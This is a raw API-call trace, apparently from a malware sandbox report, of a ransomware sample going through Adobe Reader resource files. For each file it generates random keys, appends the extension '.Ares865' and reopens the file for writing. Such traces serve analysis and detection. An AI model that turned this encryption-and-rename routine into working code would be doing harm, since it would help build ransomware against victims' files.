CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.687] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28296) returned 1 [0159.687] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.688] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.688] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.691] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.693] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.en_US_POSIX.txt" | out: lpString1="DisplayLanguageNames.en_US_POSIX.txt") returned="DisplayLanguageNames.en_US_POSIX.txt" [0159.693] lstrlenW (lpString="DisplayLanguageNames.en_US_POSIX.txt") returned 36 [0159.693] lstrlenW (lpString="Ares865") returned 7 [0159.693] lstrcmpiW (lpString1="SIX.txt", lpString2="Ares865") returned 1 [0159.693] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt.Ares865") returned 121 [0159.693] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt.ares865"), dwFlags=0x1) returned 1 [0159.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.695] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28296) returned 1 [0159.696] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.696] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.696] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.701] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.702] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.702] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.702] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es.txt" | out: lpString1="DisplayLanguageNames.es.txt") returned="DisplayLanguageNames.es.txt" [0159.702] lstrlenW (lpString="DisplayLanguageNames.es.txt") returned 27 [0159.703] lstrlenW (lpString="Ares865") returned 7 [0159.703] lstrcmpiW (lpString1=".es.txt", lpString2="Ares865") returned -1 [0159.703] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt.Ares865") returned 112 [0159.703] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt.ares865"), dwFlags=0x1) returned 1 [0159.705] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28356) returned 1 [0159.705] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.706] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.706] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.709] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.710] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.710] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.711] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_AR.txt" | out: lpString1="DisplayLanguageNames.es_AR.txt") returned="DisplayLanguageNames.es_AR.txt" [0159.711] lstrlenW (lpString="DisplayLanguageNames.es_AR.txt") returned 30 [0159.711] lstrlenW (lpString="Ares865") returned 7 [0159.711] lstrcmpiW (lpString1="_AR.txt", lpString2="Ares865") returned -1 [0159.711] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt.Ares865") returned 115 [0159.711] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt.ares865"), dwFlags=0x1) returned 1 [0159.714] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.714] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.714] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.715] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.715] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.721] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.722] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.722] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.723] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_BO.txt" | out: lpString1="DisplayLanguageNames.es_BO.txt") returned="DisplayLanguageNames.es_BO.txt" [0159.723] lstrlenW (lpString="DisplayLanguageNames.es_BO.txt") returned 30 [0159.723] lstrlenW (lpString="Ares865") returned 7 [0159.723] lstrcmpiW (lpString1="_BO.txt", lpString2="Ares865") returned -1 [0159.723] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt.Ares865") returned 115 [0159.723] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt.ares865"), dwFlags=0x1) returned 1 [0159.725] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.725] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.725] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.729] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.730] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.730] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.731] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_CL.txt" | out: lpString1="DisplayLanguageNames.es_CL.txt") returned="DisplayLanguageNames.es_CL.txt" [0159.731] lstrlenW (lpString="DisplayLanguageNames.es_CL.txt") returned 30 [0159.731] lstrlenW (lpString="Ares865") returned 7 [0159.731] lstrcmpiW (lpString1="_CL.txt", lpString2="Ares865") returned -1 [0159.731] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt.Ares865") returned 115 [0159.732] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt.ares865"), dwFlags=0x1) returned 1 [0159.738] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.738] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.739] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.739] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.739] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.786] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.786] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.786] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.787] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_CO.txt" | out: lpString1="DisplayLanguageNames.es_CO.txt") returned="DisplayLanguageNames.es_CO.txt" [0159.787] lstrlenW (lpString="DisplayLanguageNames.es_CO.txt") returned 30 [0159.787] lstrlenW (lpString="Ares865") returned 7 [0159.788] lstrcmpiW (lpString1="_CO.txt", lpString2="Ares865") returned -1 [0159.788] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt.Ares865") returned 115 [0159.788] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt.ares865"), dwFlags=0x1) returned 1 [0159.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.791] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28368) returned 1 [0159.791] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.792] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.792] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.799] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.800] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.800] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.801] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_CR.txt" | out: lpString1="DisplayLanguageNames.es_CR.txt") returned="DisplayLanguageNames.es_CR.txt" [0159.801] lstrlenW (lpString="DisplayLanguageNames.es_CR.txt") returned 30 [0159.801] lstrlenW (lpString="Ares865") returned 7 [0159.801] lstrcmpiW (lpString1="_CR.txt", lpString2="Ares865") returned -1 [0159.801] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt.Ares865") returned 115 [0159.801] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt.ares865"), dwFlags=0x1) returned 1 [0159.804] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.804] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.805] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.805] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.805] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.819] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.819] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.819] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.820] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_DO.txt" | out: lpString1="DisplayLanguageNames.es_DO.txt") returned="DisplayLanguageNames.es_DO.txt" [0159.820] lstrlenW (lpString="DisplayLanguageNames.es_DO.txt") returned 30 [0159.820] lstrlenW (lpString="Ares865") returned 7 [0159.820] lstrcmpiW (lpString1="_DO.txt", lpString2="Ares865") returned -1 [0159.821] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt.Ares865") returned 115 [0159.821] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt.ares865"), dwFlags=0x1) returned 1 [0159.823] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.823] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.823] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.824] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.824] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.829] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.829] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.829] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.830] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_EC.txt" | out: lpString1="DisplayLanguageNames.es_EC.txt") returned="DisplayLanguageNames.es_EC.txt" [0159.830] lstrlenW (lpString="DisplayLanguageNames.es_EC.txt") returned 30 [0159.830] lstrlenW (lpString="Ares865") returned 7 [0159.830] lstrcmpiW (lpString1="_EC.txt", lpString2="Ares865") returned -1 [0159.831] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt.Ares865") returned 115 [0159.831] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt.ares865"), dwFlags=0x1) returned 1 [0159.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.833] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28358) returned 1 [0159.833] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.834] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.834] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.840] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.841] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_ES.txt" | out: lpString1="DisplayLanguageNames.es_ES.txt") returned="DisplayLanguageNames.es_ES.txt" [0159.841] lstrlenW (lpString="DisplayLanguageNames.es_ES.txt") returned 30 [0159.841] lstrlenW (lpString="Ares865") returned 7 [0159.841] lstrcmpiW (lpString1="_ES.txt", lpString2="Ares865") returned -1 [0159.842] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt.Ares865") returned 115 [0159.842] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt.ares865"), dwFlags=0x1) returned 1 [0159.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.848] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28352) returned 1 [0159.848] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.848] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.849] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.854] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.855] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.855] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.856] lstrcpyW (in: lpString1=0x2cce49a, 